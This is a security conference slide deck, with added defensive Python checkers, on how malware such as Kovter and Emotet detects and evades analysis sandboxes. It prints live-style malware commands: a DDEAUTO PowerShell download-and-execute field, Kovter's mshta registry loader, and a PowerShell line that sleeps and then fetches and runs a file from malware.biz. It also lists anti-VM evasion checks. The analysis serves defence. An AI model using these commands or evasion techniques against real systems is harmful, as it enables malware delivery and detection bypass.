PLAYING GAMES IN THE SANDBOX: DYNAMIC ANALYSIS AND MODERN EVASION TACTICS
Session ID: AIR-F03
Michael Wood, Senior Manager, Dynamic Protection, SophosLabs, Sophos
#RSAC
Cloud Sandbox
[Diagram: a file arriving from the Internet is executed in the Sandbox to decide between Known Good and Known Bad?]
What is a Cloud Sandbox useful for?
Malware comes in all shapes and sizes:
  - Windows executables
  - Office & PDF documents
  - Scripts, Java, Windows Shortcuts
  - Zip, Tar, Rar, & archives
Detect 0-day threats based on behavior
Example: 0-day DDE exploit
Intended use (spreadsheet data link):
    { DDEAUTO excel "C:\\My Documents\\Profits.xls" "Sheet1!R1C1:R4C4" \p }
Exploited use (malware download):
    { DDEAUTO cmd.exe /k powershell -NonI -NoP -sta $a1=(new-object IO.StreamReader((([Net.WebRequest]::Create([System.Uri]'http://redacted[.]com/kdjsw23FGS')).GetResponse()).GetResponseStream())).ReadToEnd();powershell -e $a1 }
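The difference between the two fields above is which program the DDE field names as its server: a data application (excel) versus a command interpreter (cmd.exe chaining into powershell). As an added example, not the speaker's code, this Python checker classifies field text that a document parser (assumed) has already extracted; the INTERPRETERS list is this example's own assumption, seeded from names that appear in the deck.

```python
import re

# Constructed inputs: the two DDE field strings from the slide, the second one abridged.
DDE_FIELDS = [
    r'DDEAUTO excel "C:\\My Documents\\Profits.xls" "Sheet1!R1C1:R4C4" \p',
    r"DDEAUTO cmd.exe /k powershell -NonI -NoP -sta $a1=(new-object IO.StreamReader(...)).ReadToEnd();powershell -e $a1",
]

# Programs that are command interpreters rather than data sources. This list is an assumption
# of the example (names taken from the deck); a production list would be longer.
INTERPRETERS = {"cmd", "cmd.exe", "powershell", "powershell.exe", "mshta", "mshta.exe"}

# A DDE/DDEAUTO field: keyword, then the server (quoted or bare), then everything else.
FIELD_RE = re.compile(r'\bDDE(?:AUTO)?\s+("[^"]*"|\S+)(.*)', re.IGNORECASE | re.DOTALL)


def _basename(token: str) -> str:
    """Strip directories from a path-like token and lower-case it for comparison."""
    return token.strip('"').replace("\\", "/").rsplit("/", 1)[-1].lower()


def classify_dde(field: str) -> dict:
    """Return the DDE server a field names and whether that server (or an argument it
    chains into, as in 'cmd.exe /k powershell ...') is a command interpreter."""
    m = FIELD_RE.search(field)
    if not m:
        return {"dde": False, "server": None, "suspicious": False}
    server = _basename(m.group(1))
    chained = any(_basename(tok) in INTERPRETERS for tok in m.group(2).split())
    return {"dde": True, "server": server, "suspicious": server in INTERPRETERS or chained}


def scan_fields(fields) -> int:
    """Count fields that use an interpreter as DDE server: the exploited-use pattern from the slide."""
    return sum(1 for f in fields if classify_dde(f)["suspicious"])
```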
What is a Cloud Sandbox useful for?
Detect 0-day threats based on behavior.
But what if the threat behaves differently in the Sandbox?
Evasive threats

    IF is_sandbox() THEN
        something_good()
    ELSE
        something_bad()
is_sandbox()
Anti-VM
  Artifacts: files, registry keys, drivers, disk/CPU names
  Behavior: CPU behavior
Anti-sandbox
  Artifacts: tools or scripts, realistic hardware
  Behavior: human-like activity
Timing
  Explicit delay: Sleep()
  Implicit delay: user interaction required
something_good()
  - ExitProcess()
  - Loop forever
  - Self delete

IN THE WILD
Kovter Malware
Run key: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Value:
    mshta.exe javascript: W9N=new ActiveXObject("WScript.Shell"); ztJ4n7=W9N.RegRead("HKCU\\software\\4a9e7b11c0\\6bee3829"); eval(ztJ4n7);
Kovter VM Evasion Tests
  Running processes: VBoxService.exe, VMwareUser.exe
  Registry keys: HARDWARE\\ACPI\\DSDT\\VBOX__, HKLM\\SOFTWARE\\VMWare, Inc.
  Other artifacts: \\.\vmmemctl, PIPE VMwareCopyPasteSetClipboard event
CPUID - Artifacts
  No hypervisor:  CPUID Vendor -> GenuineIntel   CPUID Hypervisor -> 0x0
  Under KVM:      CPUID Vendor -> KVMKVMKVM      CPUID Hypervisor -> 0x80000000
CPUID - Timing
[Figure: take a timestamp t1, execute CPUID (returning GenuineIntel), take a timestamp t2; t2 - t1 is the CPUID cost]
[Figure: evasive activity plotted against legitimacy]

ACTIVE EVASIONS
Document Malware
Macro Evasion: Realistic Filename
  Is my file name only hexadecimal characters?
Macro Evasion: Realistic History
  Are there fewer than 3 recently used files?
Macro Evasion: Blacklist Processes
  Are there any VM or analysis tools running?
Macro Evasion: GEO IP
  Does the GEO IP match my target?
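The four macro checks above, the Kovter process names and the CPUID artifact slide are all tells a sandbox operator can audit on the analysis image before a sample ever sees it. As an added example (not the speaker's or any product's code), this Python checker runs those tells against a constructed description of the guest; the field names and both VM descriptions are assumptions of the example.

```python
import re

# Constructed descriptions of an analysis VM, as an operator might collect them from the guest.
# Field names are this example's own, not any sandbox product's API.
LEAKY_VM = {
    "sample_filename": "8f3e1a9c.doc",                 # sample renamed to a hash-like name
    "recent_files": ["report.docx"],                   # Office recent-file list nearly empty
    "processes": ["explorer.exe", "WINWORD.EXE", "VBoxService.exe"],
    "geoip_country": "US",
    "cpuid_hypervisor_vendor": "KVMKVMKVM",            # hypervisor CPUID leaf not masked
}
HARDENED_VM = {
    "sample_filename": "Q4_Profits_final.doc",
    "recent_files": ["budget.xlsx", "memo.docx", "agenda.docx", "notes.txt"],
    "processes": ["explorer.exe", "WINWORD.EXE"],
    "geoip_country": "DE",
    "cpuid_hypervisor_vendor": "",
}

# Process names from the Kovter slide; a real audit list would be longer.
VM_TOOL_PROCESSES = {"vboxservice.exe", "vmwareuser.exe"}
HEX_ONLY = re.compile(r"^[0-9a-f]+$", re.IGNORECASE)


def sandbox_tells(vm, target_country=None):
    """Return the is_sandbox() tells from the macro-evasion and CPUID slides this VM would trip.
    target_country is the campaign's intended region; None skips the GEO IP check."""
    tells = []
    stem = vm["sample_filename"].rsplit(".", 1)[0]
    if HEX_ONLY.match(stem):
        tells.append("filename is only hexadecimal characters")
    if len(vm["recent_files"]) < 3:
        tells.append("fewer than 3 recently used files")
    running = {p.lower() for p in vm["processes"]}
    for proc in sorted(running & VM_TOOL_PROCESSES):
        tells.append(f"VM/analysis tool running: {proc}")
    if target_country and vm.get("geoip_country") != target_country:
        tells.append(f"GEO IP {vm.get('geoip_country')} does not match target {target_country}")
    if vm.get("cpuid_hypervisor_vendor"):
        tells.append(f"CPUID hypervisor vendor exposed: {vm['cpuid_hypervisor_vendor']}")
    return tells
```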
Leverage #1 - Protection
  is_sandbox() == something_bad()
Leverage #2 - Bypass
  Does C:\B78AE926 exist?
    No: Run evasions
    Yes: Run malware
Leverage #3 - Vaccination
  is_sandbox() == TRUE

PASSIVE EVASIONS
Documents: Some Clicks Required
Explicit Delay
[Figure: timeline at Time: 0 min, 2 min and 5 min against the Sandbox Analysis window]
    powershell sleep 300;new-object system.net.webclient.downloadfile). Invoke('https://malware.biz/foo',%TEMP%\Local.exe')& start-process %TEMP%\Local.exe'"
Implicit Delay: Busy work

    FOR i = 0; i < 500,000; i++ DO
        IsDebuggerPresent()
    END FOR

[Figure: the loop's running time compared on Bare Metal, Virtual Machine and Sandbox]
Typical Human Input
  GetLastInputInfo(), GetCursorPos()
File Structure

    > unzip -l IMAGES.ZIP
      Length      Date    Time    Name
    ---------  ---------- -----   ----
       518144  2018-01-17 02:17   IMG_1715.jpg

EVASIVE TIMELINE: EMOTET
Emotet Delivery: Some Clicks Required
Emotet: Custom Loader
  Jul 2017 - Decrypts in-place: Packed EXE -> decrypt -> Emotet EXE
  Aug 2017 - Loader added: Packed EXE -> decrypt -> Loader EXE -> Emotet EXE
Emotet: Oct 2017, is_sandbox() v1
  Loader EXE gains evasions; is_sandbox() checks for:
  - file names: sample.exe, artifact.exe
  - names: John Doe; TEQUILABOOMBOOM; Wilbert / SC; admin / SystemIT
  - paths: C:\123\email.doc, C:\email.htm, C:\email.doc
Emotet: Loader In-Memory Obfuscation
[Diagram: Emotet EXE and Loader EXE (busy work, evasions) joined by Stolen Code]
  1. New memory region for stolen instructions
  2. Steal instructions from EXE, patch in detour to busy work routine
Emotet: Dec 2017, is_sandbox() v2
Loader Evasions V1:
  - String comparisons tested via lstrcmpA API
  - File existence tested via CreateFileA API
  - Sandbox detected => ExitProcess()
Loader Evasions V2:
  - String comparisons: inline strcmp function, no API
  - File existence: full file system enumeration via FindFirstFile API
  - Sandbox detected => repeat evasion tests, infinitely
What each change buys, and what it looks like from the sandbox:
  - Hide sensitive strings, like TEQUILABOOMBOOM: queries for sensitive data remain
  - Hide sensitive strings, like sample.exe: huge increase in file system inspection activity
  - Avoid bailout tell: repeated increase in file system inspection activity
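The v1-to-v2 shift moves the tell from what the loader asks (known strings and paths through lstrcmpA and CreateFileA, then ExitProcess) to how much it asks (bulk FindFirstFile enumeration that starts over instead of exiting). As an added example, not the speaker's code, this Python function flags both generations over a constructed API trace; the trace format and thresholds are assumptions of the example.

```python
import re
from collections import Counter

# Constructed API-trace lines, "<ms> <api>(<args>)", invented for this example rather than taken
# from a real sandbox report. The tell strings and paths are the ones the slides name.
TRACE_V1 = r"""10 lstrcmpA("TEQUILABOOMBOOM","WS-0417")
12 lstrcmpA("John Doe","alice")
15 CreateFileA("C:\123\email.doc")
20 ExitProcess(0)"""

def _enum_sweep(start_ms, n):   # one sweep of FindFirstFileA over n constructed directories
    return [f'{start_ms + i} FindFirstFileA("C:\\dir{i}\\*")' for i in range(n)]

TRACE_V2 = "\n".join(_enum_sweep(100, 300) + _enum_sweep(5000, 300) + _enum_sweep(9000, 300))

TELL_STRINGS = {"TEQUILABOOMBOOM", "John Doe", "SystemIT", "sample.exe", "artifact.exe"}
TELL_PATHS = {r"C:\123\email.doc", r"C:\email.htm", r"C:\email.doc"}
LINE_RE = re.compile(r"^(\d+)\s+(\w+)\((.*)\)$")


def analyze_trace(trace, enum_threshold=250, gap_ms=1000):
    """Flag v1 tells (known strings/paths through APIs, then ExitProcess) and v2 tells
    (enumeration volume, and sweeps that start again after a pause instead of exiting)."""
    hits = Counter()
    last_enum_ms, sweeps = None, 0
    for line in trace.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        ms, api, args = int(m.group(1)), m.group(2), m.group(3)
        if api == "lstrcmpA" and any(s in args for s in TELL_STRINGS):
            hits["v1_string"] += 1
        if api == "CreateFileA" and any(p in args for p in TELL_PATHS):
            hits["v1_path"] += 1
        if api == "ExitProcess" and (hits["v1_string"] or hits["v1_path"]):
            hits["bailout"] += 1
        if api.startswith("FindFirstFile"):
            hits["fs_enum"] += 1
            if last_enum_ms is not None and ms - last_enum_ms > gap_ms:
                sweeps += 1          # enumeration restarted after a pause
            last_enum_ms = ms
    verdicts = []
    if hits["v1_string"] or hits["v1_path"]:
        verdicts.append("v1: tell strings/paths queried through lstrcmpA/CreateFileA")
    if hits["bailout"]:
        verdicts.append("v1: ExitProcess right after the checks (bailout tell)")
    if hits["fs_enum"] >= enum_threshold:
        verdicts.append("v2: bulk file system enumeration via FindFirstFile")
    if sweeps:
        verdicts.append(f"v2: enumeration repeated {sweeps} more time(s) instead of exiting")
    return verdicts
```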
Emotet: Jan 2018, Evasion Fragments
  is_sandbox() disabled, but fragments remain:
  Dec 2017: TEQUILABOOMBOOM, SystemIT, John Doe
  Jan 2018: "T E Q U I L A B O O M B O O M, S y s t e m I T, Aller Doe
Emotet: Feb 2018, Evasion Retraction
[Diagram: Emotet EXE, Loader EXE, Stolen Code, busy work, evasions]
Emotet Evasive Tactic Timeline
  Jul 2017 - Busy work
  Aug 2017 - Loader module
  Oct 2017 - is_sandbox v1
  Dec 2017 - is_sandbox v2, something_good v2
  Jan 2018 - is_sandbox off, fragments remain
  Feb 2018 - is_sandbox removed

TAKEAWAYS
Summary
  Leverage: is_sandbox() == something_bad()
  Battle ground: infinitely many tactics, equally many defenses
  Raise the bar: attacks require greater depth & complexity
Predictions
  Virtual machine tactics - expect decline: existing mitigations, assets in the cloud
  Human-like behavior - expect growth: real user activity, victim profiling
  Avoid detonation - expect growth: dodge execution in the Sandbox altogether
Actions: Engage, Familiarize, Experiment
  Engage: security partners' approach to evasive threats
  Familiarize: open-source tools to test anti-sandbox tactics
    PAFish Tool - https://github.com/a0rtega/pafish
    Al-Khaser Tool - https://github.com/LordNoteworthy/al-khaser
  Experiment: deploy your own open-source sandbox
    Cuckoo Sandbox - https://cuckoosandbox.org/

THANK YOU